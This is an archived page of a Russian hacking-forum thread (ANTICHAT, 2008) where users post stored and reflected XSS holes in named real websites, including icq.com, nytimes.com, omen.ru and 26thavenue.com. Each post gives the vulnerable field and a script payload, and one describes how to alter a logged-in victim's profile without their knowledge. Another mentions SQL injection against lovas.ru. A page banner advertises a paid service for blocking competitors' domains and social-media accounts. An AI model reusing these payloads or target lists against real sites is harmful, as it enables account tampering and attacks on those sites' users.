УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Активные Xss

Страница 15 из 54

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

#141

25.02.2008, 12:03

Haruka

Познающий

Регистрация: 25.07.2007

Сообщений: 48

Провел на форуме:
119358

Репутация: 19

Отправить сообщение для Haruka с помощью ICQ

Вот
http://www.lugarus.com/users/haruka0000/
Сам скрипт прописывать в личном кабинете (зарегится надо) в поле "О себе".

#142

29.02.2008, 10:54

~~it's my~~

Banned

Регистрация: 29.09.2007

Сообщений: 512

Провел на форуме:
4038468

Репутация: 1224

Отправить сообщение для it's my с помощью ICQ

гы активка: http://www.hossi.is/index.php?option=com_n-gestabok&Itemid=43&do=listi
Пишем сообщение уязвимое поле: Heimasíða

#143

04.03.2008, 16:54

imajo.ati

Участник форума

Регистрация: 21.02.2008

Сообщений: 255

Провел на форуме:
975514

Репутация: 177

icq.com

план такой: создаётся номер icq, в детали пишется всюду где можно "><script>alert('x')</script>

затем нужно залогиниться под этим номером на сайте icq.com и зайти по ссылке
http://icq.com/people/full_details_update.php

вылетит куча алертов =)
нужно "помочь" юзеру логиниться за ваш номер.

либо можно так: кинуть ссылку юзеру на отправку формы по ссылке http://icq.com/people/full_details_update.php с вашим кодом и потом опять его отправить на эту же страницу, так же вылетит алерт. тоесть отредактировать профиль юзера без его ведома.. но юзер должен быть залогинен, так что первый вариант лучше

#144

11.03.2008, 06:30

MadFun.

Участник форума

Регистрация: 08.05.2007

Сообщений: 100

Провел на форуме:
454835

Репутация: 28

Извеняюсь за повторение
www.omen.ru
<script>alert(\'Хss\')</script>
уязвимые поля
Ищу рост от:
Ищу рост до:
Ищу вес от:
Ищу вес до:

#145

12.03.2008, 19:03

ЛифчиС5СВ

Постоянный

Регистрация: 09.03.2007

Сообщений: 323

Провел на форуме:
1552920

Репутация: 369

www.26thavenue.com

Регимся на форуме:

Код:

http://www.26thavenue.com/index.php?action=main.forums

В профайле в поля Location, Interests пишем:

Код:

<script>alert("Antichat")</script>

#146

13.03.2008, 13:52

Horsekiller

Познающий

Регистрация: 22.11.2006

Сообщений: 68

Провел на форуме:
682079

Репутация: 137

Цитата:

Сообщение от ЛифчиС5СВ

www.26thavenue.com

Поковырял еще немного.

Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем

Код:

<script>alert(/Xss/)</script>

Потом еще при отправке сообщений - поля
Link URL,
Link Title.

Код:

"><script>alert()</script>

Забил в гугл

Цитата:

попробовал в нескольких местах, везде работает.

Кроме этого есть пассивные XSS в этом движке, пример -

Код:

http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E

или в другом месте -

Код:

http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E

Последний раз редактировалось Horsekiller; 13.03.2008 в 14:05..

#147

13.03.2008, 18:23

MaSter GeN

Познающий

Регистрация: 26.01.2008

Сообщений: 71

Провел на форуме:
280720

Репутация: 141

Отправить сообщение для MaSter GeN с помощью ICQ

www.nytimes.com
Ну собственно онлайн версия газеты нью йорк таймс

Нужно имять статут зарегенного пользователя
когда герегились постим коммент б блоге типа

Код:

<irame src=http://you.site.com/xss.html  <

ну и собстевенно создаем у себя страничку с названием xss.html
содержашую

Код:

<script>alert(/XSS/)<script>

#148

15.03.2008, 03:25

xcedz

Познавший АНТИЧАТ

Регистрация: 14.01.2008

Сообщений: 1,165

Провел на форуме:
7229141

Репутация: 3099

lovas.ru
вообще бараги какие то, не люблю барыг
Заводим ак. Грузим фотку к ней добавляем коментарий с нашим кодом

напрмер таким </SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>
Возможно есть и sql inj

с помощью подзапросов к БД, вывел юзера 'lovas'@'localhost

Последний раз редактировалось xcedz; 15.03.2008 в 13:47..

#149

16.03.2008, 11:06

ZET36

Участник форума

Регистрация: 08.10.2007

Сообщений: 259

Провел на форуме:
500748

Репутация: 137

bronepoezd.ru

в гостевой в поле сообщение пишем

[.img]http://img.yandex.net/i/yandex-v9.gif Onload=alert()[./img]

без точек в бб теге

#150

18.03.2008, 22:12

freddi

Постоянный

Регистрация: 05.07.2006

Сообщений: 458

Провел на форуме:
2943499

Репутация: 807

file.mail.ru
narod.yandex.ru/disk/

заливаем файл со скриптом, который, при открытии файла, выполнится.

Страница 15 из 54

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Xss для новичков	Micr0b	Уязвимости	79	06.07.2018 22:05
Xss	bx_N	Forum for discussion of ANTICHAT	7	11.03.2007 19:17
mylivepage.ru активные XSS	__XT__	Уязвимости	3	23.12.2006 14:31

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход